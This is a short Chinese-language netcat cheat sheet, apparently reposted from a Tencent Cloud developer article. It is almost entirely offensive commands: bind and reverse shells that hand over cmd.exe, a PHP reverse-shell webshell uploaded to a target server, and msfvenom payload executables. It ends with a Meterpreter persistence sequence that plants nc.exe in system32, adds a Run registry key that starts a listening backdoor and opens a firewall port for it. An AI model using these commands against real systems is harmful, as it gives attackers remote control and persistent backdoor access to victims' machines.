服务端
nc -lvp 5678
客户端
nc 192.168.1.15 5678
接收端
nc -lvp 5555 > a.zip
发送端
nc 192.168.1.5 5678 < cms.zip
监听端
nc -lvp 5678
控制端
nc 192.168.1.5 5678 -e cmd.exe
控制端启动监听
nc -lvp 1234
编辑php反弹shell后门,vi /usr/share/webshells/php/php-reverse-shell.php,修改 ip 和 port 为控制端的地址和端口 将 php-reverse-shell.php 文件上传至目标服务器中,通过浏览器触发 php-reverse-shell.php 文件路径,在nc终端中的到反弹shell
windows/shell_hidden_bind_tcp
msfvenom –p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=4444 –f exe > root.exe
nc 192.168.0.103 4444
windows/shell_reverse_tcp
msfvenom –p windows/shell_reverse_tcp lhost=192.168.0.107 lport=8888 –f exe > root.exe
nc -lvp 8888
将nc.exe上传至目标服务器中指定目录
msf > upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32
切换到目标cmd环境
msf > shell
#添加自启动注册表项
C:\WINDOWS> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'
添加nc出入站防火墙规则
C:\WINDOWS> netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445
检查nc防火墙是否已经开放
C:\WINDOWS> netsh firewall show portopening
重启目标电脑,使用nc连接
C:\WINDOWS> nc -nv 192.168.0.101 4445
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/1920475
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。